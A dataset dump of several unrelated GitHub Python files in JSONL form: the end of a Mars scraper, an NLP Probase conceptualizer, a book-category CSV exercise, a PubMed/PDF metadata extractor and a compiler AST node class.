names_n_url.append({Hemisphere:hemis_search_list[x],Urlid:hemi_img_url})\n\n except IndexError:\n\n return f\"Search result not found\"\n\n except AttributeError:\n\n return None\n\n # df_hemi_urls = pd.DataFrame.from_dict(names_n_url, orient='columns')\n\n # df_hemi_urls.set_index('Hemisphere', inplace=True)\n \n # df_hemi_urls['URL']=str(df_hemi_urls['URL']) \n\n # pd.set_option('display.max_colwidth', -1)\n\n return names_n_url\n\n\n\nif __name__ == \"__main__\":\n\n # if running as script, print scraped data\n\n print(scrape_all())","repo_name":"SiMewL8/Mission-To-Mars","sub_path":"Mars_Scraping/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":7455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2193274261","text":"import argparse\nimport json\nimport time\nimport pickle\nimport heapq\nimport os\nfrom tqdm import tqdm\nfrom collections import defaultdict, Counter\nfrom copy import copy, deepcopy\nfrom itertools import combinations, chain\nfrom object import *\nfrom utils import *\n\n\nclass ProbaseConcept(object):\n \"\"\" Copied from https://github.com/ScarletPan/probase-concept\n \"\"\"\n def __init__(self, data_concept_path=\"\"):\n \"\"\"\n :param data_concept_path: Probase .txt file path\n :type data_concept_path: str\n \"\"\"\n self.concept2idx = dict()\n self.idx2concept = dict()\n self.concept_inverted_list = dict()\n self.instance2idx = dict()\n self.idx2instance = dict()\n self.instance_inverted_list = dict()\n if data_concept_path:\n self._load_raw_data(data_concept_path)\n\n def _load_raw_data(self, data_concept_path):\n st = time.time()\n print(\"[probase-conceptualize] Loading Probase files...\")\n with open(data_concept_path) as f:\n triplet_lines = [line.strip() for line in f]\n\n print(\"[probase-conceptualize] Building index...\")\n for line in tqdm(triplet_lines):\n concept, instance, freq = line.split('\\t')\n if concept not in self.concept2idx:\n self.concept2idx[concept] = len(self.concept2idx)\n concept_idx = self.concept2idx[concept]\n if instance not in self.instance2idx:\n self.instance2idx[instance] = len(self.instance2idx)\n instance_idx = self.instance2idx[instance]\n if concept_idx not in self.concept_inverted_list:\n self.concept_inverted_list[concept_idx] = list()\n self.concept_inverted_list[concept_idx].append((instance_idx, int(freq)))\n if instance_idx not in self.instance_inverted_list:\n self.instance_inverted_list[instance_idx] = list()\n self.instance_inverted_list[instance_idx].append((concept_idx, int(freq)))\n\n self.idx2concept = {val: key for key, val in self.concept2idx.items()}\n self.idx2instance = {val: key for key, val in self.instance2idx.items()}\n print(\"[probase-conceptualize] Loading data finished in {:.2f} s\".format(time.time() - st))\n\n def conceptualize(self, instance, score_method=\"likelihood\"):\n \"\"\" Conceptualize the given instance\n :param instance: the given instance\n :type instance: str\n :param score_method: the method to compute sscores (\"likelihood\" or \"pmi\")\n :type score_method: str\n :return: a list of (concept, score)\n :rtype: List[Tuple[ProbaseConcept, float]]\n \"\"\"\n\n if instance not in self.instance2idx:\n return []\n instance_idx = self.instance2idx[instance]\n instance_freq = self.get_instance_freq(instance_idx)\n concept_list = self.instance_inverted_list[instance_idx]\n rst_list = list()\n for concept_idx, co_occurrence in concept_list:\n if score_method == \"pmi\":\n score = co_occurrence / self.get_concept_freq(concept_idx) / instance_freq\n elif score_method == \"likelihood\":\n score = co_occurrence / instance_freq\n else:\n raise NotImplementedError\n rst_list.append((self.idx2concept[concept_idx], score))\n rst_list.sort(key=lambda x: x[1], reverse=True)\n return rst_list\n\n def instantiate(self, concept):\n \"\"\" Retrieve all instances of a concept\n :param concept: the given concept\n :type concept: str\n :return: a list of instances\n :rtype: List[Tuple[str, float]]\n \"\"\"\n\n if concept not in self.concept2idx:\n return []\n concept_idx = self.concept2idx[concept]\n rst_list = [(self.idx2instance[idx], freq) for idx, freq in self.concept_inverted_list[concept_idx]]\n rst_list.sort(key=lambda x: x[1], reverse=True)\n return rst_list\n\n def get_concept_chain(self, instance, max_chain_length=5):\n \"\"\" Conceptualize the given instance in a chain\n :param instance: the given instance\n :type instance: str\n :param max_chain_length: the maximum length of the chain\n :type max_chain_length: int (default = 5)\n :return: a chain that contains concepts\n :rtype: List[str]\n \"\"\"\n\n if instance in self.concept2idx:\n chain = [instance]\n else:\n chain = list()\n tmp_instance = instance\n while True:\n concepts = self.conceptualize(tmp_instance, score_method=\"likelihood\")\n if concepts:\n chain.append(concepts[0][0])\n else:\n break\n if len(chain) >= max_chain_length:\n break\n tmp_instance = chain[-1]\n if chain and chain[0] != instance:\n return [instance] + chain\n else:\n return chain\n\n def get_concept_freq(self, concept):\n \"\"\" Get the frequency of a concept\n :param concept: the given concept\n :type concept: str\n :return: the corresponding frequency\n :rtype: float\n \"\"\"\n\n if isinstance(concept, str):\n if concept not in self.concept2idx:\n return 0\n concept = self.concept2idx[concept]\n elif isinstance(concept, int):\n if concept not in self.idx2concept:\n return 0\n return sum([t[1] for t in self.concept_inverted_list[concept]])\n\n def get_instance_freq(self, instance):\n \"\"\" Get the frequency of an instance\n :param instance: the given instance\n :type instance: str\n :return: the corresponding frequency\n :rtype: float\n \"\"\"\n\n if isinstance(instance, str):\n if instance not in self.instance2idx:\n return 0\n instance = self.instance2idx[instance]\n elif isinstance(instance, int):\n if instance not in self.idx2instance:\n return 0\n return sum([t[1] for t in self.instance_inverted_list[instance]])\n\n def save(self, file_name):\n \"\"\"\n :param file_name: the file name to save the probase concepts\n :type file_name: str\n \"\"\"\n\n with open(file_name, \"wb\") as f:\n pickle.dump(self.__dict__, f)\n\n def load(self, file_name):\n \"\"\"\n :param file_name: the file name to load the probase concepts\n :type file_name: str\n \"\"\"\n\n with open(file_name, \"rb\") as f:\n tmp_dict = pickle.load(f)\n for key, val in tmp_dict.items():\n self.__setattr__(key, val)\n\n @property\n def concept_size(self):\n return len(self.concept2idx)\n\n @property\n def instance_size(self):\n return len(self.instance2idx)\n\n\nclass BaseConceptualizer(object):\n \"\"\" Base ASER eventuality conceptualizer to conceptualize eventualities\n \"\"\"\n def __init__(self):\n pass\n\n def close(self):\n \"\"\" Close the ASER Conceptualizer safely\n \"\"\"\n pass\n\n def conceptualize(self, eventuality):\n \"\"\" Conceptualize an eventuality\n :param eventuality: an eventuality\n :type eventuality: Eventuality\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n raise NotImplementedError\n\n def conceptualize_from_text(self, words, ners=None):\n \"\"\" Conceptualize an eventuality\n :param words: a word list\n :type words: List[str]\n :param ners: a ner list\n :type ners: List[str]\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n raise NotImplementedError\n\n\nclass SeedRuleConceptualizer(BaseConceptualizer):\n \"\"\" eventuality conceptualizer based on rules and NERs\n \"\"\"\n def __init__(self, **kw):\n super().__init__()\n self.selected_ners = frozenset(\n [\n \"TIME\", \"DATE\", \"DURATION\", \"MONEY\", \"PERCENT\", \"NUMBER\", \"COUNTRY\", \"STATE_OR_PROVINCE\", \"CITY\",\n \"NATIONALITY\", \"PERSON\", \"RELIGION\", \"URL\"\n ]\n )\n self.seed_concepts = frozenset([self._render_ner(ner) for ner in self.selected_ners])\n\n self.person_pronoun_set = frozenset(\n [\"he\", \"she\", \"i\", \"him\", \"her\", \"me\", \"woman\", \"man\", \"boy\", \"girl\", \"you\", \"we\", \"they\"]\n )\n self.pronouns = self.person_pronoun_set | frozenset(['it'])\n\n def conceptualize(self, eventuality):\n \"\"\" Conceptualization based on rules and NERs given an eventuality\n :param eventuality: an eventuality\n :type eventuality: Eventuality\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n concept_strs = self.conceptualize_from_text(eventuality.phrases, eventuality.phrases_ners)\n return [(\" \".join(concept_strs), 1.0)]\n\n def conceptualize_from_text(self, words, ners):\n \"\"\" Conceptualization based on rules and NERs given a word list an a ner list\n :param words: a word list\n :type words: List[str]\n :param ners: a ner list\n :type ners: List[str]\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n output_words = list()\n ners_dict = {ner: dict() for ner in self.selected_ners}\n for word, ner in zip(words, ners):\n if ner in self.selected_ners:\n if word not in ners_dict[ner]:\n ners_dict[ner][word] = len(ners_dict[ner])\n output_words.append(self._render_ner(ner) + \"%d\" % ners_dict[ner][word])\n elif word in self.person_pronoun_set:\n if word not in ners_dict[\"PERSON\"]:\n ners_dict[\"PERSON\"][word] = len(ners_dict[\"PERSON\"])\n output_words.append(self._render_ner(\"PERSON\") + \"%d\" % ners_dict[\"PERSON\"][word])\n else:\n output_words.append(word)\n return output_words\n\n def is_seed_concept(self, word):\n return word in self.seed_concepts\n\n def is_pronoun(self, word):\n return word in self.pronouns\n\n def _render_ner(self, ner):\n return \"__\" + ner + \"__\"\n\n\nclass ProbaseConceptualizer(BaseConceptualizer):\n \"\"\" eventuality conceptualizer based on Probase and NERs\n \"\"\"\n def __init__(self, probase_path=None, topK=None):\n super().__init__()\n self.seed_conceptualizer = SeedRuleConceptualizer()\n self.probase = ProbaseConcept(probase_path)\n self.topK = topK\n\n def close(self):\n \"\"\" Close the ASER Conceptualizer safely\n \"\"\"\n del self.probase\n self.probase = None\n\n def conceptualize(self, eventuality, start_index=0):\n \"\"\" Conceptualization use probase given an eventuality\n :param eventuality: an eventuality\n :type eventuality: Eventuality\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n if not isinstance(eventuality, Eventuality):\n eventuality = Eventuality().from_dict(eventuality)\n\n # word conceptualization\n if start_index == 0:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(\n eventuality.words, eventuality.ners\n )\n concept_strs = self._get_probase_concepts(concept_after_seed_rule, eventuality.pos_tags)\n else:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + eventuality.words[start_index:],\n [\"O\"] * start_index + eventuality.ners[start_index:]\n )\n concept_after_seed_rule = concept_after_seed_rule.__class__(eventuality.words[:start_index]\n ) + concept_after_seed_rule[start_index:]\n concept_strs = self._get_probase_concepts(\n concept_after_seed_rule, [\"FW\"] * start_index + eventuality.pos_tags[start_index:]\n )\n\n if len(eventuality.phrases) != len(eventuality.words):\n concept_strs1 = concept_strs if concept_strs else []\n for idx, indices in enumerate(eventuality._phrase_segment_indices):\n if start_index in indices:\n start_index = idx\n break\n if start_index == 0:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(\n eventuality.phrases, eventuality.phrases_ners\n )\n concept_strs2 = self._get_probase_concepts(concept_after_seed_rule2, eventuality.pos_tags)\n else:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + eventuality.phrases[start_index:],\n [\"O\"] * start_index + eventuality.phrases_ners[start_index:]\n )\n concept_after_seed_rule2 = concept_after_seed_rule2.__class__(eventuality.phrases[:start_index]\n ) + concept_after_seed_rule2[start_index:]\n concept_strs2 = self._get_probase_concepts(\n concept_after_seed_rule2, [\"FW\"] * start_index + eventuality.pos_tags[start_index:]\n )\n\n max_len = self.topK**self.topK\n used_concepts = set()\n concept_strs = []\n ptr1, ptr2, l1, l2 = 0, 0, len(concept_strs1), len(concept_strs2)\n while ptr1 < l1 and ptr2 < l2 and len(used_concepts) < max_len:\n if concept_strs1[ptr1][1] > concept_strs2[ptr2][1]:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n else:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n while ptr1 < l1 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n while ptr2 < l2 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n\n if not concept_strs and concept_after_seed_rule != \" \".join(eventuality.words):\n concept_strs = [(concept_after_seed_rule, 1.0)]\n\n concept_score_pairs = [\n (ASERConcept(words=concept_str, instances=list()), score) for concept_str, score in concept_strs\n ]\n return concept_score_pairs\n\n def conceptualize_from_text(self, words, ners, pos_tags, dependencies, start_index=0):\n \"\"\" Conceptualization use probase given an eventuality\n :param words: a word list\n :type words: List[str]\n :param ners: a ner list\n :type ners: List[str]\n :param dependencies: the input dependencies\n :type dependencies: List[Tuple[int, str, int]]\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n # word conceptualization\n if start_index == 0:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(words, ners)\n concept_strs = self._get_probase_concepts(concept_after_seed_rule, pos_tags)\n else:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + words[start_index:], [\"O\"] * start_index + ners[start_index:]\n )\n concept_after_seed_rule = concept_after_seed_rule.__class__(words[:start_index]\n ) + concept_after_seed_rule[start_index:]\n concept_strs = self._get_probase_concepts(\n concept_after_seed_rule, [\"FW\"] * start_index + pos_tags[start_index:]\n )\n\n # phrase conceptualization\n phrase_segment_indices = self._dep_compound_segment(words, dependencies)\n phrase_words = list()\n phrase_ners = list()\n phrase_pos_tags = list()\n for _range in phrase_segment_indices:\n st = min(_range)\n end = max(_range) + 1\n if start_index in _range:\n start_index = len(phrase_words)\n phrase_words.append(\" \".join(words[st:end]))\n\n if isinstance(ners[_range[0]], str):\n ner = ners[_range[0]]\n else:\n for x in ners[_range[0]].most_common():\n if x[0] != \"O\":\n ner = x[0]\n break\n phrase_ners.append(ner)\n phrase_pos_tags.append(pos_tags[_range[0]])\n\n if len(phrase_words) != len(words):\n concept_strs1 = concept_strs if concept_strs else []\n\n if start_index == 0:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(phrase_words, phrase_ners)\n concept_strs2 = self._get_probase_concepts(concept_after_seed_rule2, phrase_pos_tags)\n else:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + phrase_words[start_index:], [\"O\"] * start_index + phrase_ners[start_index:]\n )\n concept_after_seed_rule2 = concept_after_seed_rule2.__class__(phrase_words[:start_index]\n ) + concept_after_seed_rule2[start_index:]\n concept_strs2 = self._get_probase_concepts(\n concept_after_seed_rule2, [\"FW\"] * start_index + phrase_pos_tags[start_index:]\n )\n\n max_len = self.topK**self.topK\n used_concepts = set()\n concept_strs = []\n ptr1, ptr2, l1, l2 = 0, 0, len(concept_strs1), len(concept_strs2)\n while ptr1 < l1 and ptr2 < l2 and len(used_concepts) < max_len:\n if concept_strs1[ptr1][1] > concept_strs2[ptr2][1]:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n else:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n while ptr1 < l1 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n while ptr2 < l2 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n\n if not concept_strs and concept_after_seed_rule != \" \".join(words):\n concept_strs = [(concept_after_seed_rule, 1.0)]\n\n concept_score_pairs = [\n (ASERConcept(words=concept_str, instances=list()), score) for concept_str, score in concept_strs\n ]\n return concept_score_pairs\n\n def _get_probase_concepts(self, words, pos_tags):\n word2indices = defaultdict(list)\n for idx, word in enumerate(words):\n word2indices[word].append(idx)\n\n word2concepts = dict()\n for i in range(len(pos_tags)):\n if i >= len(words):\n break\n word = words[i]\n tag = pos_tags[i]\n\n if tag.startswith(\"NN\") and (len(word) > 0 and word[0].islower()):\n if self.seed_conceptualizer.is_seed_concept(word) or self.seed_conceptualizer.is_pronoun(word):\n continue\n elif word not in word2concepts:\n concepts = self.probase.conceptualize(word, score_method=\"likelihood\")\n if concepts:\n concept_set = set()\n valid_indices = list()\n for idx, (tmp_concept, score) in enumerate(concepts):\n tmp = tmp_concept.replace(\" \", \"-\")\n if tmp not in concept_set:\n valid_indices.append(idx)\n concept_set.add(tmp)\n if len(valid_indices) >= self.topK:\n break\n word2concepts[word] = \\\n [(concepts[idx][0].replace(\" \", \"-\"), concepts[idx][1]) for idx in valid_indices]\n else:\n continue\n\n matched_words = list(word2concepts.keys())\n replace_word_tuples = list()\n for i in range(1, len(word2concepts) + 1):\n replace_word_tuples.extend(list(combinations(matched_words, i)))\n\n output_words_heap = list()\n max_len = self.topK**self.topK\n pre_min_score = 1.0\n min_score = -1.0\n pre_comb_len = 0\n comb_len = 1\n for word_tuples in replace_word_tuples:\n tmp_words_list = [(1.0, words)]\n for word in word_tuples:\n new_tmp_words_list = list()\n # can be further optimized...\n for prob, tmp_words in tmp_words_list:\n for concept, c_prob in word2concepts[word]:\n _tmp_words = tmp_words[:]\n for idx in word2indices[word]:\n _tmp_words[idx] = concept\n new_tmp_words_list.append((prob * c_prob, _tmp_words))\n del tmp_words_list\n tmp_words_list = new_tmp_words_list\n\n for tmp in tmp_words_list:\n if len(output_words_heap) >= max_len:\n tmp = heapq.heappushpop(output_words_heap, tmp)\n else:\n heapq.heappush(output_words_heap, tmp)\n if min_score < tmp[0]:\n min_score = tmp[0]\n comb_len = len(word_tuples)\n if pre_min_score == min_score and pre_comb_len + 1 < comb_len and len(output_words_heap) >= max_len:\n break\n if pre_min_score != min_score:\n pre_min_score = min_score\n pre_comb_len = comb_len\n\n output_words_list = [heapq.heappop(output_words_heap)[::-1] for i in range(len(output_words_heap))][::-1]\n return output_words_list\n\n def _dep_compound_segment(self, words, dependencies):\n tmp_compound_tuples = list()\n for governor_idx, dep, dependent_idx in dependencies:\n if dep.startswith(\"compound\"):\n tmp_compound_tuples.append((governor_idx, dependent_idx))\n\n tmp_compound_tuples = sorted(tmp_compound_tuples)\n compound_tuples = list()\n used_indices = set()\n for i in range(len(tmp_compound_tuples)):\n if i in used_indices:\n continue\n s1 = tmp_compound_tuples[i]\n for j in range(i + 1, len(tmp_compound_tuples)):\n if j in used_indices:\n continue\n s2 = tmp_compound_tuples[j]\n # s1[0] is the governor\n if s2[0] in set(s1[1:]):\n s1 = s1 + s2[1:]\n used_indices.add(j)\n # s2[0] is the governor\n elif s1[0] in set(s2[1:]):\n s1 = s2 + s1[1:]\n used_indices.add(j)\n # s1[0] and s2[0] are same\n elif s1[0] == s2[0]:\n s1 = s1 + s2[1:]\n used_indices.add(j)\n else:\n break\n used_indices.add(i)\n # check continuous spans\n sorted_s1 = sorted(s1)\n if sorted_s1[-1] - sorted_s1[0] == len(sorted_s1) - 1:\n compound_tuples.append(s1)\n else:\n s1s = []\n k1 = 0\n k2 = 1\n len_s1 = len(sorted_s1)\n indices = dict(zip(s1, range(len_s1)))\n while k2 < len_s1:\n if sorted_s1[k2 - 1] + 1 != sorted_s1[k2]:\n # k1 to k2-1\n s1s.append(tuple([s1[indices[sorted_s1[k]]] for k in range(k1, k2)]))\n k1 = k2\n k2 += 1\n if k1 != k2:\n s1s.append(tuple([s1[indices[sorted_s1[k]]] for k in range(k1, k2)]))\n compound_tuples.extend(s1s)\n\n compound_tuples.sort()\n used_indices = set(chain.from_iterable(compound_tuples))\n\n segment_rst = list()\n word_idx = 0\n compound_idx = 0\n num_words = len(words)\n num_tuples = len(compound_tuples)\n while word_idx < num_words:\n if word_idx not in used_indices:\n segment_rst.append((word_idx, ))\n elif word_idx in used_indices and compound_idx < num_tuples and word_idx == compound_tuples[compound_idx][0]:\n segment_rst.append(compound_tuples[compound_idx])\n compound_idx += 1\n word_idx += 1\n\n return segment_rst\n\n\ndef conceptualize_eventualities(conceptualizer, eventualities):\n \"\"\" Conceptualize eventualities by a conceptualizer\n :param conceptualizer: a conceptualizer\n :type conceptualizer: BaseConceptualizer\n :param eventualities: a list of eventualities\n :type eventualities: List[Eventuality]\n :return: a dictionary from cid to concept, a list of concept-instance pairs, a dictionary from cid to weights\n :rtype: Dict[str, ASERConcept], List[ASERConcept, Eventuality, float], Dict[str, float]\n \"\"\"\n\n cid2concept = dict()\n concept_instance_pairs = []\n cid2score = dict()\n for eventuality in tqdm(eventualities):\n results = conceptualizer.conceptualize(eventuality)\n for concept, score in results:\n if concept.cid not in cid2concept:\n cid2concept[concept.cid] = deepcopy(concept)\n concept = cid2concept[concept.cid]\n if (eventuality.eid, eventuality.pattern, score) not in concept.instances:\n concept.instances.append(((eventuality.eid, eventuality.pattern, score)))\n if concept.cid not in cid2score:\n cid2score[concept.cid] = 0.0\n cid2score[concept.cid] += score * eventuality.frequency\n concept_instance_pairs.append((concept, eventuality, score))\n return cid2concept, concept_instance_pairs, cid2score\n\n\ndef conceptualize_file(input_file, output_file, conceptualizer, start_index=0):\n with open(output_file, \"w\") as ff:\n with open(input_file, \"r\") as f:\n for line in f:\n line = json.loads(line)\n if \"ners\" not in line:\n line[\"ners\"] = []\n conceptualized_eventualities = []\n for i, eventuality in enumerate(line[\"eventualities\"]):\n eventuality = Eventuality().from_dict(eventuality)\n eventuality._phrase_segment_indices = eventuality._phrase_segment()\n line[\"eventualities\"][i] = eventuality.to_dict(minimum=True)\n conceptualized_results = conceptualizer.conceptualize(eventuality, start_index)\n conceptualized_eventualities.append([(x[0].to_dict(), x[1]) for x in conceptualized_results])\n line[\"conceptualized_eventualities\"] = conceptualized_eventualities\n conceptualized_results = conceptualizer.conceptualize_from_text(\n line[\"tokens\"], line[\"ners\"], line[\"pos_tags\"], line[\"dependencies\"], start_index\n )\n line[\"conceptualized_text\"] = [(x[0].to_dict(), x[1]) for x in conceptualized_results]\n\n ff.write(json.dumps(line))\n ff.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data_file\", type=str, default=\"extraction/capableOf_elec.jsonl\")\n parser.add_argument(\"--relation_type\", type=str, default=\"capableOf\")\n parser.add_argument(\"--output_file\", type=str, default=\"conceptualization/capableOf_elec.jsonl\")\n parser.add_argument(\"--probase_path\", type=str, default=\"probase/data-concept-instance-relations.txt\")\n args = parser.parse_args()\n\n os.makedirs(os.path.dirname(args.output_file), exist_ok=True)\n\n conceptulizer = ProbaseConceptualizer(args.probase_path)\n\n conceptualize_file(args.data_file, args.output_file, conceptulizer, len(TEMPLATES[args.relation_type][1]))\n","repo_name":"HKUST-KnowComp/FolkScope","sub_path":"src/pattern/conceptualizer.py","file_name":"conceptualizer.py","file_ext":"py","file_size_in_byte":29992,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"}
+{"seq_id":"13899010951","text":"# Retornar a porcentagem de livros pro categoria lidos de um arquivo json\nimport json\nimport csv\n\nwith open('books.json') as books_json:\n books = json.load(books_json)\n\ncategorias = set()\ncategorias_livros = []\nfor book in books:\n categorias_livros.extend(book['categories'])\n for categoria_livro in categorias_livros:\n categorias.add(categoria_livro)\n\nrelatorio = dict()\nfor categoria in categorias:\n relatorio[categoria] = []\nfor categoria, conj_livros in relatorio.items():\n for book in books:\n if categoria in book['categories']:\n conj_livros.append(book)\n\nwith open('relatorio-livros.csv', 'w') as relatorio_csv:\n writer = csv.writer(relatorio_csv)\n total_books = len(books)\n headers = ['Categoria', 'Percentual']\n writer.writerow(headers)\n for categoria in relatorio:\n total_books_por_categoria = len(relatorio[categoria])\n print(categoria, total_books, total_books_por_categoria)\n perc = round(((total_books_por_categoria * 100) / total_books), 2)\n writer.writerow([categoria, perc])\n","repo_name":"vanderson-henrique/trybe-exercises","sub_path":"COMPUTER-SCIENCE/BLOCO_35/35_2/exercicios/exercicio4.py","file_name":"exercicio4.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"31676548512","text":"import re\nfrom tika import parser\nfrom pymed.pymed import PubMed, retrieve_informations\nfrom collections import defaultdict\nfrom bs4 import BeautifulSoup\nfrom server_module import db\nfrom server_module.models import Article\n\n\ndef get_pdf_content(pdf_file):\n raw = parser.from_file(pdf_file, xmlContent=True)\n return BeautifulSoup(raw['content'], 'lxml'), raw['metadata']\n\n\ndef extract_pdf_information(soup, metadata):\n regex_journal = r\"( *[A-Z][a-z]+ *)(of|and|[:&])*\"\n\n subject = find_subject_content(metadata)\n\n if subject and len(subject) <= 20:\n matches = re.finditer(regex_journal, subject)\n for i, match in enumerate(matches):\n if i == 0:\n start_str = match.start()\n end_str = match.end()\n journal = subject[start_str:end_str]\n else:\n journal = \"\"\n\n data = {\n \"title\": metadata['title'] if 'title' in metadata else \"\",\n \"publication_date\": metadata['Creation-Date'] if 'Creation-Date' in metadata else \"\",\n \"keywords\": metadata['Keywords'] if 'Keywords' in metadata else \"\",\n \"abstract\": subject if len(subject) > 200 else \"\",\n \"journal\": journal,\n \"doi\": find_doi(metadata),\n \"authors\": metadata[\"Author\"] if 'Author' in metadata else \"\",\n \"wordcount\": get_word_count(soup.text),\n \"aav_terms\": get_aav_count(soup.text),\n \"ref_publications\": get_ref_count(soup)\n }\n return data\n\n\ndef get_pubmed_info(title):\n pm = PubMed()\n url_id = pm.fetch(title, retrieve_mode='xml')\n obj_results = retrieve_informations(url_id, format=\"xml\")\n data_dict = pm.return_information(obj_results)\n return data_dict\n\n\ndef find_subject_content(metadata):\n subject = \"\"\n if 'cp:subject' in metadata:\n subject = metadata['cp:subject']\n else:\n for k in metadata.keys():\n if \"subject\" in k.lower():\n subject = metadata[k]\n\n return subject\n\n\ndef find_doi(metadata):\n doi = \"\"\n if 'doi' in metadata:\n doi = metadata['doi']\n else:\n for v in metadata.values():\n if \"doi:\" in v:\n doi = re.search(r\"doi:\\S+\", v)\n doi = doi.replace(\"doi:\", \"\")\n return doi\n\n\ndef get_aav_count(text):\n regex_aav = r\"AAV(\\d*\\/|\\d*-)*\\w*(\\([\\w, -]*\\))*(-\\w+)*\"\n d = defaultdict(int)\n for match in re.finditer(regex_aav, text, re.M):\n d[match.group(0)] += 1\n return {k:v for k,v in d.items()}\n\n\ndef get_ref_count(soup):\n ref_reg = r\"^\\d+( *\\**\\.)* ([A-Z]\\S* ([A-Z]\\S* )*[A-Z]\\w*(, )*)+\"\n regex_aav = r\"AAV(\\d*\\/|\\d*-)*\\w*(\\([\\w, -]*\\))*(-\\w+)*\"\n rel_publ = []\n for el in soup.find_all('p'):\n if re.search(ref_reg, el.text, re.M) and re.search(regex_aav, el.text, re.M | re.I):\n rel_publ.append(el.text)\n return rel_publ\n\n\ndef get_word_count(text):\n list_words = [word for word in re.split(r\"\\s\", text) if word]\n return len(list_words)\n\n\ndef return_information_as_batch(id_list, source_db, batch_size=20, db_output=\"sql\"):\n count = 0\n\n if type(batch_size) is float and 0 < batch_size < 1:\n batch_size = len(id_list) * batch_size\n batch_ids = [id_list[portion:portion + batch_size] for portion in range(0, len(id_list), batch_size)]\n\n for batch in batch_ids:\n url = source_db.fetch(batch)\n if len(url) > 2000:\n raise Exception(\"Error: URL too long. Please select a lower batch size.\")\n soup = retrieve_informations(url, format='xml')\n data = source_db.return_information(soup, as_dataframe=False)\n if db_output == \"sql\":\n for i in range(len(data['pubmed_id'])):\n if not Article.query.filter_by(id=data['pubmed_id'][i]).first():\n article = Article(id=data['pubmed_id'][i],\n abstract=data['abstract'][i],\n title=data['title'][i],\n publication_date=data['publication_date'][i],\n keywords=data['keywords'][i],\n doi=data['doi'][i],\n authors=data['authors'][i])\n db.session.add(article)\n db.session.commit()\n count += 1\n return f\"{count} out of {len(id_list)} uploaded!\"\n","repo_name":"sboomi/med-article-extractor","sub_path":"info-extractor-app/server_module/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74161976193","text":"from expr import *\n\n\nclass Name(Expr):\n def __init__(self, **kwargs) -> None:\n self.message = ['id', 'mode']\n self.id: str = ''\n self.mode = None\n super().__init__(**kwargs)\n\n def gen(self):\n varsym = self._symtab.get_varsym(self.id)\n self.type = varsym.type\n\n self.mode.gen()\n self._genir.code[-1][0] += 'NAME'\n self._genir.code[-1].append(self.id)\n","repo_name":"1604042736/c--","sub_path":"c--2.4/Compiler/ASTs/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
